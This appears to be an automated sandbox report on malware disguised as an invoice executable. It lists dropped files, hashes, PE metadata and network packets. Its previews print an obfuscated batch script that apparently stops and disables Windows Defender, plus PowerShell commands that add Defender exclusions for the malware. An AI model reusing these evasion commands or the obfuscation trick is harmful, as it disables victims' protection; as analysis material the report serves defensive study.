                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhngzly1.1a0.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiaxfjc3.2me.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ginmqqci.bv3.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaqb5cyd.oyj.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):2.75
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z7yM:F3
                                                                                                              MD5:C987B59C76EA2E8854B59456910A97A9
                                                                                                              SHA1:9C9B6CDCD12E0CD3CDDBC36A37CCCFB39084A0D7
                                                                                                              SHA-256:5B957D5A9AF25F06775FD1CF60B3A0BA352AFF046C25909B1048F39D20A82BE5
                                                                                                              SHA-512:F411FD12E999D64BBAEF9C45C572A194EBE304E3BB8446CDAE95C3630514D01E08405A9D1FDB4D014E307F5B57DA9B5802AC93BD55E5D4251D88B5D2BBC0C9C9
                                                                                                              Malicious:true
                                                                                                              Preview: .......H
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.KMuPlgZO.20210225151021.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5885
                                                                                                              Entropy (8bit):5.426114680347712
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZzjJNCqDo1Z8ZBjJNCqDo1ZEFHdjZejJNCqDo1ZiYttjZw:e
                                                                                                              MD5:794F27F33C57215E93933ABBD7D08078
                                                                                                              SHA1:EBCBD871DAE78BBEF57836C8E88B6FC8E5F6832C
                                                                                                              SHA-256:CF3BA8F7E0711BD501934E46A2CC4948B734AB0AEAC8D14E934026DF9C9F9239
                                                                                                              SHA-512:8C93F913D52347F045B7B817C7AF7F5D571548A50A1E7E0A8B9C7CD04F286BA135BE637A34D8CF8660D70A54629B6A835B2C6F8495315C74150D26C084498516
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151046..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..Process ID: 3400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151046..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151413..Username: DESKTOP
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.M_cQjc0Y.20210225151010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5869
                                                                                                              Entropy (8bit):5.381608150850337
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZcjJNfDqDo1Z44ZgjJNfDqDo1ZwLg9gzgjZDjJNfDqDo1ZlcgDgDgRZu:y
                                                                                                              MD5:5733AEE55EEC4C977793BA763910861B
                                                                                                              SHA1:655C9B8408D1AED016AB0839E38FD46C7EAEAE34
                                                                                                              SHA-256:A52FDE98308C1EB3306470F1E69566363B015D744404B731D4B5B9464F0C2827
                                                                                                              SHA-512:FDC520CEE5CFA132AFB8898074C6FBD92B500FFED012418F3D807DDE0744DC316F32FD6A50ED567FB1CE805272AF97607DE8F93A410D895C708FEB197F9277D5
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151023..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151023..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151359..Username: computer
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38008
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              MD5:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              SHA1:320DEA63289CAD5685CFBA395D673142F85FC6FF
                                                                                                              SHA-256:6E67B342328C550BEAD9BF5A953ABBB12085AEDB4A7A625C242B5474E71A5DB8
                                                                                                              SHA-512:73D4C3830287C6E7B33DE1ED8A2A8DAA104FA90399600B7189B2499E4259436F684E0362215A8783A5E4093EFFDA313DA8748986FF9D272E59AA72AEBEDDE22D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x.............. ........@.. ....................................@.....................................W.......................x............................................................ ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........3...b...........................................................*..(....*..(....*~s!........s"........s?........*BsZ...oY...o#...*.r.9.p(.....(....r.9.p(....s3...&*....0..........r...pr...p~....o....r...pr...p~....o....~....o....r...pr$..p~....o....r,..pr8..p~....o....~....o....~....o.....s......%r@..pr...p~....o....r...pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....o....%r...pr&..p~....o....r...pr:..p~....o....~....o....rB..prV
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File size:38008
                                                                                                              MD5:a0f103f98ede4da72e178ee05dabe1e1
                                                                                                              SHA1:320dea63289cad5685cfba395d673142f85fc6ff
                                                                                                              SHA256:6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
                                                                                                              SHA512:73d4c3830287c6e7b33de1ed8a2a8daa104fa90399600b7189b2499e4259436f684e0362215a8783a5e4093effda313da8748986ff9d272e59aa72aebedde22d
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x............... ........@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4096ee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                              Error Number:-2146762487
                                                                                                              Not Before, Not After
                                                                                                              • 2/24/2021 8:31:21 PM 2/24/2022 8:31:21 PM
                                                                                                              Subject Chain
                                                                                                              • C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:EF28D8EF5540C2DDF8982021C060330B
                                                                                                              Thumbprint SHA-1:3FB51DB8532A75A759CC58FCAC48F75BC950A343
                                                                                                              Thumbprint SHA-256:ED4807C63650641F009FDC3D82D1A3A58C8D6EEA22E655FD1970962F803188EB
                                                                                                              Serial:5FF50A8B939E7010528F8FA57C8DC691

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9694 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x3e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8000 | 0x1478 | .text
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x76f4 | 0x7800 | False | 0.374055989583 | data | 4.93746742515 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x3e0 | 0x400 | False | 0.46875 | data | 3.52295456663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xa058 | 0x388 | data | English | United States

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
LegalCopyright | Copyright 2022 MElPBjWh. All rights reserved.
Assembly Version | 0.0.5.0
InternalName | NbTfoyms.exe
FileVersion | 7.5.8.1
CompanyName | KlNrqpbB
LegalTrademarks | ZAYgcLMa
Comments | SArWMDgi
ProductName | NbTfoyms
ProductVersion | 0.0.5.0
FileDescription | GFZIgBqf
OriginalFilename | NbTfoyms.exe
Translation | 0x0409 0x0514

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                              Feb 25, 2021 15:09:59.764848948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.764924049 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.765875101 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.765904903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.765964985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.767544031 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.767570972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.767616034 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.768167973 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.768198013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.768239975 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.769320011 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.769350052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.769416094 CET4972280192.168.2.4172.67.172.17
